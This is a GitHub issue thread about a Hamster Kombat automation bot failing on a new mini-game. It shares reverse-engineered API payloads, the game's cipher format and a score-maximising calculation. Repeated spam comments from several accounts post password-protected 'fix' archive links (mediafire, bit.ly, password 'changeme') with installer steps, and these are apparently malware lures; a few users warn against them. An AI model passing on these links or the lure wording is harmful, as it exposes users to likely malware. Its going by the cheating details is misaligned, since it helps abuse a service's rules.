### ISSUE TITLE
New minigame got added.

### ISSUE THREAD

**Issue by joshuazzz1** [masterking32/MasterHamsterKombatBot#236]
I have been getting this error

Unable to get daily keys mini game.

It's probably due to the new minigame

![Screenshot](https://github.com/user-attachments/assets/492abdbb-d98d-44cd-ac40-1659801ff9c6)

**Comment by ashwin8454** [comment]
Yeah🤑.
I think this mini-game has the potential to earn a lot of coins when the hexagon area is completely filled. 
![MEITU_20240827_182413576](https://github.com/user-attachments/assets/5961b6dd-892a-474e-aa47-4011fc20ab63)

**Comment by tboy1337** [comment]
> I have been getting this error
> 
> Unable to get daily keys mini game.
> 
> It's probably due to the new minigame
> 
> ![Screenshot](https://private-user-images.githubusercontent.com/93087065/361789808-492abdbb-d98d-44cd-ac40-1659801ff9c6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NjYxODEsIm5iZiI6MTcyNDc2NTg4MSwicGF0aCI6Ii85MzA4NzA2NS8zNjE3ODk4MDgtNDkyYWJkYmItZDk4ZC00NGNkLWFjNDAtMTY1OTgwMWZmOWM2LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEzMzgwMVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTE3NjFiMmVhZDI4NjM3NTAzY2E5MjI2NGRjM2NjODU3ODNlZDRmN2VmZmU2OTNlMDgyYzYxNzQzNjg5NGEyMzEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.E3IYMab75UH_MugWW9dKX5AME4uVwD0utUDna5dtokg)

Ive seen the same error also.

**Comment by Fy0urM** [comment]
this is because the mini game has been moved to the playgrounds section, the request parameter for launching the game has been changed, and the response received when requesting config has been changed.

**Comment by nevs83** [comment]
Tiles - is a new mini-game with currency

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by tboy1337** [comment]
> Download hxxps://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

@masterking32

**Comment by Pawansingh333** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

Don't download this

**Comment by Homavi88** [comment]
Where can I change the code to make everything work?
thanks

**Comment by Mihaitafox11** [comment]
anyone has a bot for the new Hexa minigame?

**Comment by ashwin8454** [comment]
Mabe soon

**Comment by QualityRU** [comment]
Here's a clue. The cipher for the new game is unique and does not match between accounts. If you play the game and get the cipher, then use it - the limit of coins that can be taken from it ~200k, I think it is the limit per day. How else to get the key, I do not know yet.

**Comment by ashwin8454** [comment]
> Here's a clue. The cipher for the new game is unique and does not match between accounts. If you play the game and get the cipher, then use it - the limit of coins that can be taken from it ~200k, I think it is the limit per day. How else to get the key, I do not know yet.

no, i got morethan 200k coins

**Comment by QualityRU** [comment]
When receiving the cipher, what was the score in the game?

**Comment by armtixx** [comment]
> Here's a clue. The cipher for the new game is unique and does not match between accounts. If you play the game and get the cipher, then use it - the limit of coins that can be taken from it ~200k, I think it is the limit per day. How else to get the key, I do not know yet.

172800 is max points count, there is score coefficient which is 469, so you can get 172800 * 469 = 81043200 coins

**Comment by armtixx** [comment]
> i found out this for now config response now have dailyKeysMiniGames instead of dailyKeysMiniGame:
> 
> ```
> {
>     "dailyCipher": {
>         "cipher": "QlJ4PTg==",
>         "bonusCoins": 1000000,
>         "isClaimed": false,
>         "remainSeconds": 16722
>     },
>     "feature": ["airdrop_connect_ton_wallet"],
>     "dailyKeysMiniGames": {
>         "Candles": {
>             "id": "Candles",
>             "startDate": "2024-08-26T20:00:00.000Z",
>             "levelConfig": "- a - - c c.- a b b b d.- a 0 0 e d.s s f - e d.v - f g h h.v x x g - -",
>             "youtubeUrl": "https://www.youtube.com/@HamsterKombat_Official",
>             "bonusKeys": 1,
>             "isClaimed": false,
>             "totalSecondsToNextAttempt": 360,
>             "remainSecondsToGuess": -120704.249,
>             "remainSeconds": 20321.046,
>             "remainSecondsToNextAttempt": -120404.249,
>             "remainPoints": 0
>         },
>         "Tiles": {
>             "id": "Tiles",
>             "startDate": "2024-08-27T11:00:00.000Z",
>             "levelConfig": "",
>             "youtubeUrl": "",
>             "bonusKeys": 0,
>             "maxPoints": 172800,
>             "isClaimed": false,
>             "totalSecondsToNextAttempt": 86400,
>             "remainSecondsToGuess": -1,
>             "remainSeconds": 74321.046,
>             "remainSecondsToNextAttempt": 0,
>             "remainPoints": 172800
>         }
>     }
> }
> ```
> 
> payload for https://api.hamsterkombatgame.io/clicker/start-keys-minigame
> 
> ```
> {
>   "miniGameId": "Candles"
> }
> ```
> 
> payload for https://api.hamsterkombatgame.io/clicker/claim-daily-keys-minigame
> 
> ```
> {
>   "miniGameId": "Candles",
>   "cipher": "XXXXXXX"
> }
> ```

Cipher for new mini-game formed like this: l.cipher + '|' + bt().account_id + '|' + l.game_id + '|' + l.score + '|' + l.sig

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by epis78** [comment]
i ran the new version but still get minigames error

**Comment by devCarlosHenSil** [comment]
> i ran the new version but still get minigames error

me too

**Comment by miladesign** [comment]
you should call get-promos request before start minigame
and ip request moved to start. after get init json (before authByTelegram request)

**Comment by tboy1337** [comment]
@miladesign make a PR?

**Comment by Metercedes** [comment]
@masterking32 did u add this game yet? bc im not able to obtain this hex puzzle thingy

**Comment by afdah** [comment]
> @masterking32 did u add this game yet? bc im not able to obtain this hex puzzle thingy

it's already working. unlike the puzzle game(candles) where you get to claim a key, hexa puzzle (tiles) allows you to claim coins.

**Comment by anggakepo** [comment]
is it possible to replace bearer token with query? I can't get bearer token, because hamster bot won't run when I open it on desktop or web.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
